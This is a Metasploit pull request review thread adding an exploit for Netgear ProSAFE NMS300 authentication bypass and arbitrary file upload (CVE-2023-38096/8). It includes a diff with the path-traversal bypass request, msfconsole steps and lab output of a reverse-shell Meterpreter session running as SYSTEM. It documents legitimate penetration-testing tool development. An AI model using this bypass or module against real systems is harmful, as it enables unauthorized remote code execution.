### PR TITLE
Add Netgear NMS RCE (CVE-2023-38096/8) exploit

### PR DESCRIPTION
**Pull request by EgeBalci**
Hello :wave:

This module exploits the newly discovered authentication bypass and arbitrary file upload vulnerabilities (CVE-2023-38096 and CVE-2023-38098) in the Netgear ProSAFE NMS300. The vulnerabilities affect all versions below **1.7.0.22**. By chaining together these vulnerabilities, an unauthenticated remote attacker can execute arbitrary code with SYSTEM privileges. Since there is already a `netgear_nms_rce` module inside the Metasploit, I have updated the existing one. The new version can exploit both the older and the newer vulnerabilities.

**ZDI Refs:**
- [CVE-2023-38096](https://www.zerodayinitiative.com/advisories/ZDI-23-920/)
- [CVE-2023-38098](https://www.zerodayinitiative.com/advisories/ZDI-23-918/)

## Testing Environment Setup
For installing the vulnerable version follow the steps below,
1. Download the [installer](https://www.netgear.com/support/product/nms300#download) for versions below **v1.7.0.22**.
2. Follow installation steps.

At the end web panel will be exposed on the `http://localhost:8080/` address.

## Verification
- [ ] Start `msfconsole`
- [ ] Do: `use exploit/windows/http/netgear_nms_rce`
- [ ] Do: `set rhost [IP]`
- [ ] Do: `check`

### CODE REVIEW

**Comment by cdelafuente-r7** [comment]
Thanks @ EgeBalci. That's a great improvement! We just want to make sure chaining these attacks will still work with the original target versions (1.5.0.2, 1.4.0.17 and 1.1.0.13). Or maybe, the module could have both techniques and a way for the user to select which one to use.

File: modules/exploits/windows/http/netgear_nms_rce.rb [hunk 1]
```diff
@@ -10,75 +10,87 @@ class MetasploitModule < Msf::Exploit::Remote
...
   end
 
-
   def check
     res = send_request_cgi({
-      'uri'    => normalize_uri(datastore['TARGETURI'], 'fileUpload.do'),
-      'method' => 'GET'
+      'uri' => normalize_uri(datastore['TARGETURI'], 'userSession.do/../fileUpload.do'),
+      'method' => 'POST',
+      'vars_get' => { 'method' => 'loginHtml' } # This is required for auth bypass above v1.5.0.11
```
Comment (adfoster-r7) [inline modules/exploits/windows/http/netgear_nms_rce.rb:71]: Looks like this has already been tested; but just as a note to the R7 tester to verify the previous versions still work :+1:

**Review by cdelafuente-r7 — COMMENTED** [review]
Thanks @EgeBalci for improving this module. I just left a minor suggestion in the documentation. Otherwise, it looks good to me. I tested against NMS versions 1.5.0.2, 1.4.0.17, 1.7.0.12, and 1.7.0.1 on Windows 2019 Server and it works as expected. I couldn't find the installer for version 1.1.0.13. Do we have any guidance about where to find this version?

**Comment by EgeBalci** [comment]
> Thanks @EgeBalci for improving this module. I just left a minor suggestion in the documentation. Otherwise, it looks good to me. I tested against NMS versions 1.5.0.2, 1.4.0.17, 1.7.0.12, and 1.7.0.1 on Windows 2019 Server and it works as expected. I couldn't find the installer for version 1.1.0.13. Do we have any guidance about where to find this version?

Unfortunately no :/

**Review by cdelafuente-r7 — APPROVED** [review]

**Comment by cdelafuente-r7** [comment]
So, if you weren't able to test version 1.1.0.13, would you mind removing it from the list of tested versions in the documentation and in the module description? Also, You can add a line saying that this should work against this version but it wasn't tested.

**Comment by cdelafuente-r7** [comment]
Thanks @EgeBalci ! everything looks good to me now. I'll go ahead and land it.
- Example output
```
msf6 exploit(windows/http/netgear_nms_rce) > exploit rhosts=192.168.100.234 lhost=192.168.100.1 verbose=true

[*] Started reverse TCP handler on 192.168.100.1:4444
[*] 192.168.100.234:8080 - Uploading payload...
[+] 192.168.100.234:8080 - Payload uploaded successfully
[*] 192.168.100.234:8080 - Executing payload...
[*] Sending stage (175686 bytes) to 192.168.100.234
[*] Meterpreter session 1 opened (192.168.100.1:4444 -> 192.168.100.234:50444) at 2023-08-25 12:14:44 +0200

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : WIN2019
OS              : Windows 2016+ (10.0 Build 17763).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x86/windows
```

**Comment by cdelafuente-r7** [comment]
# Release Notes
This adds an exploit module that leverages an authentication bypass and an arbitrary file upload in Netgear ProSAFE NMS300. These vulnerabilities have been identified as CVE-2023-38096 and CVE-2023-38098 respectively and affects versions below 1.7.0.22. By chaining together these vulnerabilities, an unauthenticated remote attacker can execute arbitrary code with SYSTEM privileges.

**Pull request merged**